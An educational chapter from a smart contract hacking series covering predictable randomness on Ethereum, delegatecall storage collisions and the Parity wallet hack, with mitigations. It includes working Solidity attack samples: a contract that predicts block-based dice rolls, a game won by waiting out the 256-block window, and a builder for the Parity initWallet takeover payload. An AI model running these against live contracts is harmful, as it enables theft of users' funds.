This is our final free chapter in this smart contract hacking series. Hopefully you enjoyed it. I am not sure what I am going to work on next: perhaps some malware analysis, reverse engineering, or maybe some hacking in the cloud.
We are currently in the fourth quarter and slammed with work, so I wouldn't expect any more posts or the full blockchain release until after that eases up.
Operations that require random values need a sound source of
randomness coupled with the algorithm. Without sufficient randomness and a
large enough value space, we end up with collisions or predictable values,
depending on what we are doing. This is often the case in video game operations
and data security encryption schemes. For example, we do not want to create
random values that are predictable and repeatable based on known or
controllable values. With controllable values, an attacker could duplicate the
value by reverse engineering how it was originally created and what the random
seed is. Also, if the value is predictable within a game, we may be able to
cheat the game by creating our own valid values that exploit the perceived
randomness.
Now, we are not going to deep dive into cracking cryptography
or brute forcing hash values. First, it takes too much time and effort. Second,
there are easier and more efficient ways of tackling cryptographic issues. Lastly,
we do not have time for rabbit holes in a week-long penetration test that requires
us to explore many other attack vectors. Spending a whole week cracking a
single cryptographic issue would make for a terrible and inefficient penetration test
that leaves the rest of the target unexamined. That may be suitable for R&D or
a CTF, but not for a penetration test.
What you need to understand is that certain values often
used as randomness on the blockchain are not suitable as a source of randomness.
Additionally, understanding how things are implemented will get you much
farther when it comes to cryptography than attacking it directly. You do not
need to break NSA-level encryption by attacking it directly. Instead, you should
concentrate on finding insecure implementations of these algorithms to get what
you need.
Padding oracle attacks are a great example of this, as you may recall if you
were in the hacking community back in the late 2000s. The padding oracle attack relied
on error messages about the padding within blocks to find a way to decrypt
them. This was a brilliant attack vector, as you didn’t need to understand deep cryptographic
concepts to decrypt data blocks, only how blocks work and how the scheme was implemented.
With this knowledge you could leverage
the flawed implementation to get the decrypted values.
On the blockchain there are a number of insecure sources
that developers like to use when implementing random values. Most of these are
very bad ideas for reasons we will discuss below.
For example, the following non-exhaustive but often used list
of values is not suitable for randomness within sensitive operations. Usage of
these types of values in any sort of calculation is always a flag for closer
review:
✓ Secret keys in private variables
✓ Block Timestamps
✓ Block Numbers
✓ Block Hash values
Why, you ask? Well, regardless of the data being marked as
private, a private variable's storage value is 100% readable on
the blockchain. There are no secret values. These can be queried as you saw in
the storage issues chapter. Embedding hard-coded values is certainly not
private either, as they are in the source code, which may be posted directly on the
blockchain, or they could be reverse engineered out of the bytecode used to deploy
the contract when the source code is not available. If you can get hold of
that value, then you can violate the security of that functionality.
Secondly, do not rely on predictable values for randomness,
especially from block data sources. Block timestamps can be influenced by miners,
which can aid in orchestrated attacks when they are used as a source of randomness. Also,
block numbers are easy to query and enable predictable attacks when used in calculations.
Every call executed within the same block sees the same block number, so every
function seeded with it is effectively using the same
PRNG input. Finally, block hash values are terrible to use for randomness, as only the
last 256 block hash values on chain actually return a real value. Anything older than
256 blocks is returned as 0, meaning that every calculation will use the same value of
0. We will cover that in some of our examples.
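To make the point about block data concrete, here is a minimal sketch, assuming a hypothetical WeakDice contract that seeds its roll from block.timestamp and block.number. Both contract names and the dice logic are made up for illustration. Because the attacking contract runs in the same block as the victim, it can recompute the exact same "random" value before placing its guess.

```solidity
pragma solidity ^0.6.6;

// Hypothetical victim: derives its "random" roll from block data only.
contract WeakDice {
    function roll() public view returns (uint256) {
        return uint256(keccak256(abi.encodePacked(block.timestamp, block.number))) % 6;
    }

    // Returns true when the caller guessed the roll.
    function bet(uint256 guess) public view returns (bool) {
        return guess == roll();
    }
}

// Hypothetical attacker: repeats the same calculation in the same block.
contract DicePredictor {
    function attack(WeakDice dice) public view returns (bool) {
        // Same block, same timestamp and number, therefore the same result.
        uint256 predicted =
            uint256(keccak256(abi.encodePacked(block.timestamp, block.number))) % 6;
        return dice.bet(predicted);
    }
}
```

Deploying both in Remix and calling attack with the WeakDice address should report a winning guess on every call, since nothing in the seed differs between the two contracts.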
This is not an exhaustive list, just a small
sample of bad choices for random values. There are plenty of other values
that could be used within calculations as a random seed and are also
predictable. It is always important to review the data used in these
calculations when reviewing smart contract functionality. So, without the need
for a PhD in cryptography, you should easily discern that all of the above
implementation examples are terrible sources of random data for sensitive
operations.
Let’s start out by taking a look at a simple example of using a
blockhash value with a block number value. While a hash of a block might seem
like a good idea for a random number, there are numerous issues with it. Firstly,
a block number is a known value that persists for the duration of a block
and can be queried and fed into an attacker’s copy of the algorithm to produce
the same result and bypass controls. But there is also an underlying vulnerability
in this approach when coupled with a blockhash, which we will take a look at
below.
Action Steps:
✓ Open up your terminal and launch ganache-cli
✓ Type out the code below into Remix
✓ Within the Deploy Environment section dropdown,
change the JavaScript VM to the Web3 Provider option.
✓ Deploy the contract to ganache with the deploy
button in Remix
1.  pragma solidity ^0.6.6;
2.
3.  contract simpleVulnerableBlockHash {
4.      uint32 public block_number;
5.      bytes32 public myHash;
6.
7.      function get_block_number() public {
8.          block_number = uint32(block.number);
9.      }
10.
11.     function set_hash() public {
12.         myHash = bytes32(blockhash(block_number));
13.     }
14.
15.     function wasteTime() public {
16.         uint test = uint(block.number);
17.     }
18. }
The simple contract above queries the current block number
in the get_block_number function on line 8 and stores it in the block_number
variable declared on line 4. This is the
current block number on the blockchain.
Then we have a function on line 11 which takes the stored block
number and passes it to the blockhash function to retrieve the block hash and
store it in the myHash variable.
✓ What happened, and what implications would this
have on calculations you are using this value with?
So, we have two variables: a block number and the block hash
associated with that block number. What’s the big deal? Well, let’s walk through
this step by step and then play around with the remaining wasteTime function on
line 15 to find out.
Starting out, if we have the deployed contract and we execute
the get_block_number function followed by the set_hash function, we will get the
following result when checking the block_number and myHash variables.
We see the block number of 3 and then a hex value
representing the block hash that starts with 0x995f. Now, if we were to use this
hash as a random value, or within some algorithm to create a random value, it
might work depending on what we were doing, the level of security required, and
the length of time we need it to be perceived as random. It wouldn’t be
secure, but maybe good enough for your operations. However, a blockhash has a dark little secret
a developer may not be aware of. Block
hashes in Ethereum have short-term memory: the hash is not available for blocks more than
256 behind the current block.
So, what happens when we look up the block hash after a time
lapse? Let’s give that a try by clicking the wasteTime button until we reach
block 259. wasteTime reads the block number
and discards it, just to mine new blocks for us; it doesn’t actually make any real
changes. Normally blocks on the Ethereum network are produced on their own roughly every
12 to 15 seconds and we would simply wait for 256 blocks, but we don’t have
traffic on our local blockchain, so we will advance it ourselves with wasteTime.
After we reach block 259 we execute the set_hash function
again, which takes the block_number of 3, now more than 256 blocks old, and looks up
its hash. If you retrieve the myHash variable again after executing
set_hash, it results in:
You will notice the myHash variable is now all zeros (0x000...), because
hashes of blocks older than 256 from the current block are not available and the lookup returns a value
of 0. Having a predictable value of 0 in
our random algorithm can very likely create a situation where it would be easy
to recreate the random number to bypass or cheat functionality in the smart
contract.
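The 256-block window can be checked before a hash is trusted. The sketch below is a minimal illustration with hypothetical names (BlockHashWindow, hashAvailable, safeBlockHash). It only stops a stale lookup from silently turning into zero; it does not make a block hash a good source of randomness.

```solidity
pragma solidity ^0.6.6;

contract BlockHashWindow {
    // True when blockhash(n) can still return a real value:
    // n must be one of the 256 most recent blocks, excluding the current one.
    function hashAvailable(uint256 n) public view returns (bool) {
        return n < block.number && block.number - n <= 256;
    }

    // Reverts instead of handing back zero for a block outside the window.
    function safeBlockHash(uint256 n) public view returns (bytes32) {
        require(hashAvailable(n), "block hash no longer available");
        return blockhash(n);
    }
}
```

On the ganache chain used above, hashAvailable(3) should flip from true to false once the chain has advanced past block 259.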
Video Walkthrough of Bad Randomness:
A classic terrible example is something similar to this:
function checkWinner() public payable {
    // blockNumber is a state variable recorded earlier in the game
    if (uint256(blockhash(blockNumber)) % 2 == 0) {
        msg.sender.transfer(balance);
    }
}
The example above uses the blockhash function with a
blockNumber variable within its calculation. The issue with this calculation is that
if the block stored in blockNumber is more than 256 blocks old, blockhash will return zero,
and based on the calculation the user will win every single time.
All the attacker would need to do is play the game to set
the blockNumber variable. Then the attacker would simply wait for 256 blocks to
pass before checking if he has won the game. By doing this the attacker would
guarantee a win.
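As a rough illustration of that flow, here is a minimal sketch of a game with this flaw. The contract name StaleHashGame, the 1 ether stake and the 2 ether payout are all assumptions made up for this example and are not taken from any real contract.

```solidity
pragma solidity ^0.6.6;

// Hypothetical game, for illustration only.
contract StaleHashGame {
    // Block in which each player placed their bet.
    mapping(address => uint256) public betBlock;

    // Lets anyone fund the prize pool.
    receive() external payable {}

    function play() public payable {
        require(msg.value == 1 ether, "bet is 1 ether");
        betBlock[msg.sender] = block.number;
    }

    function checkWinner() public {
        uint256 n = betBlock[msg.sender];
        require(n != 0 && n < block.number, "no settled bet");
        delete betBlock[msg.sender];
        // Flaw: once n is more than 256 blocks old, blockhash(n) is zero,
        // 0 % 2 == 0 is always true, and the caller always wins.
        if (uint256(blockhash(n)) % 2 == 0) {
            msg.sender.transfer(2 ether);
        }
    }
}
```

An attacker calls play once, waits (or on ganache, mines) more than 256 blocks, and only then calls checkWinner.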
In order to see how this would work let’s take a look at a
simple game of chance that implements this concept.
Action Steps:
✓ Type out this code within Remix
✓ Deploy the code using the Ganache and Web3 options
✓ Try to locate the vulnerability within the code
✓ Try to exploit the vulnerability in this code so
that you are always the winner
The best way to prevent these issues is to avoid using on-chain
predictable values or secret values as the seed for your operations and
calculations. We can do this with
trusted external oracles. Oracles are
external data sources that your contract can use when it needs random values or
trusted data. There are projects that
specifically solve this problem, for example Chainlink, which has networks of
oracle nodes that handle data queries and provide back trusted, verified data,
including random numbers. A simple example
of using Chainlink for a random number is found at the following link:
It is always a good idea to avoid on-chain secret data or
block-related information when performing any sort of sensitive operation and
instead utilize an oracle.
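The general shape of an oracle-fed value is a request followed by a callback. The sketch below is a generic, hypothetical request and fulfil pattern and is not the Chainlink API: the contract name, the oracle address, the event and both functions are assumptions for illustration. A real integration should follow the provider's own consumer contract and verify whatever proof it supplies.

```solidity
pragma solidity ^0.6.6;

// Hypothetical request/fulfil pattern; NOT the Chainlink API.
contract OracleSeededDraw {
    address public oracle;      // trusted off-chain randomness provider (assumption)
    uint256 public lastRandom;  // most recent value delivered by the oracle
    bool public pending;        // true while a request is outstanding

    event RandomnessRequested(address indexed requester);

    constructor(address _oracle) public {
        oracle = _oracle;
    }

    // Step 1: the contract asks for randomness; the oracle watches for this event.
    function requestDraw() public {
        require(!pending, "request already pending");
        pending = true;
        emit RandomnessRequested(msg.sender);
    }

    // Step 2: only the oracle may deliver the value, in a later transaction.
    function fulfill(uint256 randomness) public {
        require(msg.sender == oracle, "only the oracle may answer");
        require(pending, "nothing requested");
        pending = false;
        lastRandom = randomness;
    }
}
```

The important property is that the value arrives from outside the chain after the request is committed, so nothing the caller can read on chain at request time predicts it.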
Often while
writing smart contracts we will want to call functions within other contracts,
either to leverage functionality within the other contract or for upgradability
reasons. We can do this by leveraging libraries with delegate calls. There are
various reasons to do this, including code re-use and the cost savings of not
re-deploying large libraries. We will take a look at this while reviewing the
technical details of the Parity Wallet hack at the end of this chapter. But first
let’s discuss some other aspects and nuances of the delegate call so we are
comfortable with how it works and how we can use it in attacks.
We have seen multiple ways to interact with external
contracts, for example using the ABI of a contract with Web3 calls. We have also
created interfaces to a contract when creating our malicious attacking
contracts. Now we will expand on this using low-level delegate calls to
external contracts.
In this section we will show how to interact with other
contracts using lower-level functions such as call and delegatecall. We will
show how the code can leverage the functionality of another contract using
delegate calls within Solidity. Beware that, as usual, whenever you use lower-level
functions within Solidity, bad, bad things can and will happen.
Firstly, let’s define some terms so that I don’t
confuse myself or the readers, because this can get a bit
confusing if we don’t know which contract we are discussing. I am going to
label the following two terms up front so we can distinguish which contract we
are discussing and how the two interact. This particular vulnerability and how it works took me a
minute to wrap my head around. I actually had to deploy contracts and play with
code interactions before it made sense.
I hope to save you the trouble, since there were no good resources when
I started learning this.
We will define the two contracts as follows for the
purposes of the code examples we are analyzing.
✓ Calling contract: The contract we
are interacting with through our DApp
✓ Logic contract: The library contract
holding some kind of business logic that we call with delegatecall or call
With that out of the way let’s get back to confusing myself
along with you.
We often see delegate calls used when we don’t have an ABI
interface, and as an upgradability pattern within Solidity. In order to explain delegate
call, we are first going to talk about the differences between a regular call
and a delegate call and what the results are with each of these call types.
Delegate calls are used to run the code of the
logic contract while having the changes reflected in the context of the calling
contract. It essentially behaves as if you imported the functionality of the
logic contract into the calling contract. This behaves much like importing libraries
when you are coding large projects and using that functionality as if it were
part of your project.
Vs
The regular call acts more like a remote API, where we are
making changes on the remote logic contract rather than on our calling contract. When
using a regular call, we are calling the logic contract and the effects of that call
are retained within the logic contract rather than in the context of the
calling contract.
I know, I know, I just confused you, so let’s look at a simple
example and talk about the outcomes of each instance depending on whether we are
using call or delegate call:
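A minimal sketch of two such contracts in a single file follows, assuming the names used in the walkthrough (LogicContract, CallingContract, returnedAddress, logic_pointer, print_address, print_my_call_address, print_my_delegate_address). Deploying LogicContract from the constructor is an assumption about how the logic address gets picked up automatically, and any line numbers quoted in the walkthrough will not line up with this sketch.

```solidity
pragma solidity ^0.6.6;

// Logic contract: holds the code that both call types execute.
contract LogicContract {
    address public returnedAddress;            // storage slot 0
    event contractAddress(address addr);

    function print_address() public returns (address) {
        // address(this) depends on the context the code is running in.
        returnedAddress = address(this);
        emit contractAddress(returnedAddress);
        return returnedAddress;
    }
}

// Calling contract: the one we click on in Remix.
contract CallingContract {
    address public returnedAddress;            // slot 0, mirrors LogicContract
    address public logic_pointer;              // slot 1, where the logic lives

    constructor() public {
        // Assumption: deploy the logic contract here and remember its address.
        logic_pointer = address(new LogicContract());
    }

    // delegatecall: logic code runs against THIS contract's address and storage.
    function print_my_delegate_address() public returns (bool) {
        (bool ok, ) = logic_pointer.delegatecall(
            abi.encodeWithSignature("print_address()")
        );
        return ok;
    }

    // call: logic code runs against the logic contract's own address and storage.
    function print_my_call_address() public returns (bool) {
        (bool ok, ) = logic_pointer.call(
            abi.encodeWithSignature("print_address()")
        );
        return ok;
    }
}
```

Deploy CallingContract only; the event in each transaction's logs shows which address the code believed it was running as.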
The best way to start to understand delegate calls is to
actually play with them. Deploy the above contract within Remix and play around
with it for a few minutes before reading the code walkthrough.
Also note you can review the video walkthroughs to see this
in action. But make sure that you have the contract open in Remix and you are
following along; this is essential to your learning and retention of these concepts.
Note that the above code comprises two contracts within one
Solidity file, which will deploy without any issues in Remix and provide you
with both the logic contract and the calling contract. The calling contract
will have the functionality that you will be interacting with. So just paste it into Remix, compile and
deploy it.
I have also supplied a bit of code that automatically grabs
the logic contract address via a call on line 14, since they are both in the
same file. Automatically grabbing the second contract’s address is useful when
you’re debugging, so you don’t have to deploy the first contract and manually
add its address every time you change the code and redeploy.
Things to try on your own before continuing:
✓ Deploy the above code as a single Solidity file
in Remix and review the address of CallingContract.
✓ Click the print_my_delegate button and review
the output in the logs section of the transaction.
✓ Click the print_my_call button and review the
output in the logs section of the transaction.
Now that you have interacted with this code a bit within
Remix, let’s break it down piece by piece, talk through some of the code, then
do a walkthrough and explain the results.
6.  function print_address() public returns(address){
7.      returnedAddress = address(this);
8.      emit contractAddress(returnedAddress);
9.  }
10. }
The logic contract is pretty simple. We create an address
variable named returnedAddress on line 3, which holds the value of the
address obtained in the print_address function.
On line 7 we get the current address of the contract with the this
keyword. This is kind of like self in Python, which says give me the
value associated with the current instance of the object, in this case
the address of the current contract based on the context in which it has been
called. In order to view this variable, we emit an event on line 8, simply
printing out the current value of the contract address.
In order to make use of the logic contract we have the
CallingContract which is shown below:
The first thing to notice on line 2 is the use of the exact same
returnedAddress variable from the LogicContract. This is important when using
delegate calls, as the call will modify that variable locally on the calling
contract from the logic contract’s remote functionality. A delegate call writes to storage by slot position rather than by variable name, so
you should always declare the same variables in each contract and have them in
the same order when using delegate call. We will talk more about variables and their
behavior with delegate calls shortly when manipulating storage slots.
Next you will notice two functions, one that is
using a call on line 9 and one that is using a delegatecall on
line 6.
We will see the differences between these call
types. Both of these functions call the same print_address function from
the LogicContract using the logic_pointer address variable created on line 3. The logic_pointer variable is simply the
address of the logic contract, so our calls know where they are directed. These
two calls look very similar, but that is where the similarities end, as we will
see in the following walkthrough.
Note: You will also notice some strange syntax wrapping our
call to print_address using abi.encodeWithSignature. This is simply an encoding mechanism
applied before sending our data with our calls: it produces the 4-byte function selector followed by any ABI-encoded arguments. It is similar to encoding web calls with
base64, except that delegatecall only accepts a single un-padded bytes argument.
It’s nothing special, it’s just the way we need to encode the data on these
types of calls.
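To see what that encoding produces, here is a small sketch (the contract name EncodingDemo and its function names are hypothetical) that builds the payload for print_address two ways: with the helper, and by hand from the first 4 bytes of the keccak256 hash of the signature.

```solidity
pragma solidity ^0.6.6;

contract EncodingDemo {
    // What the low-level calls are handed: selector plus encoded arguments.
    function viaHelper() public pure returns (bytes memory) {
        return abi.encodeWithSignature("print_address()");
    }

    // The same thing by hand: first 4 bytes of keccak256 of the signature.
    function byHand() public pure returns (bytes memory) {
        bytes4 selector = bytes4(keccak256("print_address()"));
        return abi.encodePacked(selector);
    }

    // Compares the two byte strings by hashing them.
    function same() public pure returns (bool) {
        return keccak256(viaHelper()) == keccak256(byHand());
    }
}
```

Since print_address takes no arguments, the whole payload is just the 4-byte selector, and same() should return true.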
Deploying our Simple Example:
Actions to take:
✓ Deploy the contract in Remix
✓ Click the print_my_call_address button
✓ Click the print_my_delegate_address button
The deployed contract should look similar to the following
showing the contract address for CallingContract and the two functions
available to us:
After you deploy the contract you will want to take note of
the address of the CallingContract. In this example, above the buttons, you will
see the calling contract address, which starts with 0x75A. Write the
address of your contract down, as this contract address will be important when
reviewing the output of the two functions print_my_call_address and
print_my_delegate_address.
First let’s review the output of using a regular call to the
logic contract. When we click the print_my_call_address button you will see a
new transaction post in the transaction window below the code.
Click the down arrow to view the transaction details and you
should see output similar to the following under the logs section.
The output shows the event that was emitted when the logic
contract code was called, with the returned address parameter coming from this. Notice that this is not the same address as
our calling contract. This is the address of our LogicContract.
Next click the button for print_my_delegate_address. Again,
check out the transaction window and click the down arrow to view the
details. Within the logs section of the
transaction you will see a similar event action:
This time note that the address returned is your
CallingContract address that starts with 0x75A. This is because with delegate
call the code was run as if it was imported into the CallingContract, using the
context of the CallingContract for the returnedAddress variable posted to the
event.
Now let’s quickly go over how variables work within delegate
calls and the importance of properly aligning these variables so they do not
overwrite the wrong storage slots. In
our example above we saw that we can execute code from the logic contract in
the context of the caller. This is also
true for the storage in the contract. Both the code and the storage are based
on the context of the caller.
So, what does this mean?
It means that when we change the value of a variable using our logic
contract, it will change the value of the variable within our calling contract
if a delegatecall is used. This can be quite dangerous and lead to disastrous
results, as you will see in our case study of the Parity Wallet attack
at the end of this chapter.
For now, let’s go over a simple example of what happens in
storage when variables are incorrectly handled with delegatecall.
This example
follows the same structure as the previous contract, with both the logic
and calling contract in the same Solidity file and the logic
contract’s address retrieved automatically for convenience.
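A minimal sketch of a pair of contracts with this kind of mismatch, assuming the variable and function names used in the notes that follow (a, b, logic_pointer, set, setA) and initial values of 5. The constructor-based deployment is again an assumption.

```solidity
pragma solidity ^0.6.6;

contract LogicContract {
    uint256 public a;                 // slot 0 in the logic contract's layout

    function set(uint256 _a) public {
        a = _a;                       // compiled as "write to storage slot 0"
    }
}

contract CallingContract {
    uint256 public b = 5;             // slot 0  <- this is what set() will hit
    uint256 public a = 5;             // slot 1
    address public logic_pointer;     // slot 2

    constructor() public {
        // Assumption: deploy the logic contract and remember its address.
        logic_pointer = address(new LogicContract());
    }

    // Intends to update "a", but delegatecall writes by slot, not by name.
    function setA(uint256 _a) public returns (bool) {
        (bool ok, ) = logic_pointer.delegatecall(
            abi.encodeWithSignature("set(uint256)", _a)
        );
        return ok;
    }
}
```

Note that the signature string must spell out uint256; writing set(uint) would hash to a different selector and the delegatecall would not find the function.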
Things to note:
✓ There is only a single piece of functionality between
these contracts, which sets the value of “a”.
✓ Three variables are declared in the calling contract:
“a”, “b” and “logic_pointer”
✓ One variable is declared in the logic contract: “a”
✓ A delegate call is used in the calling contract
to set the value of “a” using the set function from the logic contract.
Action Steps:
✓ Take note of the ordering of the variables
between the two contracts.
✓ Type out this code into Remix and then deploy
the CallingContract
✓ Click the b and a buttons and review their values
✓ Now click the setA button and review the values
again
In the action steps above you will have
noticed that when you set the value of “a”, the value of “b” was the one that
changed. Why is this?
We have to start thinking about which
context we are in when calling the contract. The image below should help to
clear this up. Take a look at that image
for a minute and try to think about what happened.
So, in the calling contract we have “b”, “a” and
“logic_pointer”. Then we have the variable “a” in the logic contract. When
using a delegatecall we are executing the set function in the logic contract
under the context of the calling contract, which has those 3 variables with “b”
being the first variable. You see where I am going with this? Essentially the logic contract only knows
about the “a” variable and writes the new value to the first storage slot.
However, we are in the context of the calling contract, and the calling
contract’s first storage slot is the variable “b”.
So, when we initially deploy the contract,
we have the following, where both “a” and “b” equal 5.
Then we click the setA button to execute the delegatecall into
the set function in the logic contract, and this results in “a” remaining at the
value of 5 while “b” is updated to the value passed to the setA function. In this
case I used the value of 3.
The b value is overwritten because it occupies the first slot
in the storage of the calling contract, and the logic contract only knows
about a single variable “a” in its own contract, thus overwriting the value in
the first storage slot. Since we used
delegate call we are not writing to the storage of the logic contract but instead
to that of the calling contract.
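For contrast, here is a sketch of the same idea with the layouts lined up, so the write lands where the developer intended. The contract name AlignedCallingContract is hypothetical; the only meaningful change is that “a” is declared first in both contracts.

```solidity
pragma solidity ^0.6.6;

contract LogicContract {
    uint256 public a;                 // slot 0

    function set(uint256 _a) public {
        a = _a;                       // writes slot 0 of whoever's context we run in
    }
}

contract AlignedCallingContract {
    uint256 public a = 5;             // slot 0: now matches LogicContract.a
    uint256 public b = 5;             // slot 1: untouched by set()
    address public logic_pointer;     // slot 2

    constructor() public {
        logic_pointer = address(new LogicContract());
    }

    function setA(uint256 _a) public returns (bool) {
        (bool ok, ) = logic_pointer.delegatecall(
            abi.encodeWithSignature("set(uint256)", _a)
        );
        return ok;
    }
}
```

With this ordering, clicking setA with 3 should leave “b” at 5 and change “a” to 3.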
Take a minute to let that all sink in. Review the picture
from above with the storage slots. Think about the previous example and what
context you are in when using delegate call. Then come back to this and check
out the case study of this in action in a multi-million-dollar theft in real
life.
When it comes to attacks against misconfigured smart contracts
with delegate calls, the most famous was the Parity Wallet hack,
which resulted in multi-million-dollar losses. I will briefly, but in detail,
discuss what one of the Parity attacks entailed. This should bring together
what you learned into a real-world example.
The vulnerable Parity contract we are referencing is located
at the following address:
Essentially the Parity wallet was a multi-signature wallet
which was extremely lightweight and relied on functionality from a main library
contract. Using libraries is a way of saving costs, as wallets will be deployed
many times on the blockchain and the fee to deploy a contract is based on
the size of its code. Fewer instructions in a
smaller, lightweight wallet means lower overall deployment costs. By
deploying the main functionality within a callable library, the code only
incurred a one-time fee for the larger codebase. Each additional deployed
contract comes at a much smaller cost due to its reduced size.
This is fantastic from both a cost savings and upgradeability perspective,
depending on how you deploy the functionality and how you handle access to
libraries.
But the Parity wallet had a few shortcomings due to a
combination of public initialization functions that did not track whether they had already been used and
authorization issues. The authorization issues allowed direct calls after initial
contract deployment, and delegate calls allowed attackers to interact with
initialization functions in the context of the calling contract.
Parity issues that allowed an attack:
✓ An attack vector into the library via the wallet
(delegatecall in a fallback function)
✓ Initialization functions that didn’t check a
wallet’s current initialization state
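The second issue is the easier one to picture. A minimal sketch of an initialization function that does track its own state might look like the following. The contract name GuardedInit and the single-owner layout are simplifications for illustration and are not the Parity code.

```solidity
pragma solidity ^0.6.6;

// Simplified, hypothetical single-owner wallet logic.
contract GuardedInit {
    address public owner;
    bool public initialized;

    function initWallet(address _owner) public {
        // Without this check, anyone could call initWallet again
        // and replace the owner after deployment.
        require(!initialized, "already initialized");
        initialized = true;
        owner = _owner;
    }
}
```

A second call to initWallet now reverts instead of silently replacing the owner.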
In this attack an attacker could gain control of a wallet
via the library’s public initialization function, reached through the wallet’s
fallback function. The attack took two transactions.
The first transaction took ownership of the contract and is found at the
following link:
Browse to the above URL and click the “click to see more”
link to review the live data from the output, also shown and described in
detail below. The transaction input data shown made a call to the initWallet
function. This call overwrote the owners of the contract with the attacker’s
address at [4] within the input data section.
Let’s go into a little detail as to what the transaction
values above are and how they were derived. This will help in understanding
what is going on with this attack.
The data in the transaction can be broken down as
follows:
✓ A 4-byte MethodID
✓ Five 32-byte values
The 4-byte MethodID which precedes the function parameters
is the first 4 bytes of the sha3 (Keccak-256) hash of the initWallet method signature. We
can derive this value by using the web3 utility
functions and taking a substring of the sha3 output. You can try this out with the
following commands.
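The same derivation can also be sketched in Solidity. The contract name MethodIdDemo is hypothetical, and the signature string initWallet(address[],uint256,uint256) is an assumption based on the parameters described in this chapter (an owners array, a required count and a daily limit).

```solidity
pragma solidity ^0.6.6;

contract MethodIdDemo {
    // First 4 bytes of keccak256 over the canonical function signature.
    // Assumed signature: initWallet(address[],uint256,uint256)
    function initWalletMethodId() public pure returns (bytes4) {
        return bytes4(keccak256("initWallet(address[],uint256,uint256)"));
    }
}
```

Calling initWalletMethodId in Remix returns 4 bytes that can be compared against the start of the input data in the attack transaction.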
The 5 parameters following the MethodID are defined as
follows:
✓ [0] Offset to the owners array length value:
0x60 hex, or 96 bytes (3 x 32 = 96 bytes to the array length held at [3])
✓ [1] How many owners are required (zero)
✓ [2] Daily spending limit of the contract (a
large number)
✓ [3] Owners array length of 1 owner
✓ [4] Attacker’s address value as the only address
in the owners array
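To see where those five words come from, here is a sketch that builds an equivalent payload with the ABI encoder. The contract and function names are hypothetical, the signature string is the same assumption as before, and the attacker address and daily limit are left as parameters rather than copied from the real transaction.

```solidity
pragma solidity ^0.6.6;

contract InitWalletCalldata {
    // Builds: MethodID | [0] offset 0x60 | [1] required | [2] daily limit
    //                  | [3] owners.length | [4] owners[0]
    function build(address attacker, uint256 dayLimit)
        public
        pure
        returns (bytes memory)
    {
        address[] memory owners = new address[](1);
        owners[0] = attacker;           // [4] the only owner
        uint256 required = 0;           // [1] owners needed to confirm
        return abi.encodeWithSignature(
            "initWallet(address[],uint256,uint256)",
            owners,
            required,
            dayLimit                    // [2] daily spending limit
        );
    }

    // 4-byte MethodID plus five 32-byte words.
    function payloadLength(address attacker, uint256 dayLimit)
        public
        pure
        returns (uint256)
    {
        return build(attacker, dayLimit).length; // 4 + 5 * 32 = 164
    }
}
```

The dynamic array is why the first word is an offset: the three head slots come first (3 x 32 = 96 bytes), and the array length and its single element follow.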
A second
transaction, shown below, was then sent, which transferred _value at [1] to the
supplied _to address at [0] within the data section of the following
transaction:
Within the
Parity wallet there was a default payable function, also known as a fallback
function, which used a delegate call into the wallet library. Fallback functions
are called when a call is made to a contract and the call data does not match any
function in that contract, or when value is sent with no data at all. Using this functionality an attacker was able to
reach the fallback function and leverage the delegate call by calling the
wallet with msg.data naming a library function the wallet itself did not define, along with the target
and values shown in the above exploit.
Fallback
functions are often used as a catchall within contracts. I kind of think of
them as the default case of a switch statement or the else clause in a block of
logic. You will see fallback functions aid us in many attacks, for example
tx.origin and reentrancy attacks. You also saw the usage of fallback functions
in our chapter on reentrancy, when we used the functionality of a fallback
function to loop through the contract calls and siphon value from the contract.
Taking a look
at line 431 of the source code from the above link, this fallback function
exposes all public functions of the wallet library to anyone, through the fallback
function’s ability to send data into the wallet library via a delegatecall in
the context of the calling contract on line 436. No worries, context is explained
in our section on how delegate calls work.
Notice that on line 435, the code logic states that if
the length of the data within the transaction is greater than 0, a delegate call is made which
calls the wallet library in the context of the calling contract. We showed this above with the actual
transaction data. But from a higher level the attacker used this logic to pass
data to the wallet contract to perform the following two actions:
1. First calling the initWallet function, as in the
first transaction data we showed, to take ownership of a wallet via the wallet’s
fallback functionality.
2. Followed by the execute function to transfer
out the wallet’s funds.
In order to perform this attack, all the attacker needs to
do is:
✓ Make a transaction call to the wallet address
✓ Not specify a function defined in the wallet, in
order to invoke the fallback function
✓ Send msg.data with the values we saw in the
attack transactions above
The fallback function will capture this transaction and
forward it to the wallet library for us via a delegate call.
This attack resulted in millions of dollars of losses for
users of the Parity wallet. I wanted to show an example of a real-world attack
so you could see how it was constructed and know how serious this issue
is. Millions of dollars can be lost with
a relatively simple attack, in this case about 31 million dollars.